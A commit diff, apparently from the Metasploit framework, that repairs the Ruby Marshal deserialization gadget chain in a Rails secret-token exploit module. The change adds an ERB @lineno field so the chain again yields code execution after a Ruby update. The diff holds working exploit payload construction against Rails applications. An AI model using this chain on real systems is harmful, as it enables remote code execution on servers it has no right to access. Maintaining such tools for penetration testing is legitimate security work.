fix popchain

justinsteven · justinsteven · commit 17bad7bd4fa7 · 2016-09-13T21:25:14.000+10:00
ERB changed as per <ruby/ruby@e82f4195d4> which broke the popchain used for code execution.
diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -200,18 +200,20 @@ def build_cookie
       return "\x04\b" +
       "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
         ":\x0E@instanceo" +
-          ":\bERB\x06" +
+          ":\bERB\x07" +
             ":\t@src"+  Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" + 
         ":\f@method:\vresult:" +
         "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
     end
     if datastore['RAILSVERSION'] == 3
       return Rex::Text.encode_base64 "\x04\x08" +
       "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
         ":\x0E@instance" +
-          "o"+":\x08ERB"+"\x06" +
+          "o"+":\x08ERB"+"\x07" +
             ":\x09@src" +
               Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" + 
         ":\x0C@method"+":\x0Bresult"
     end
   end
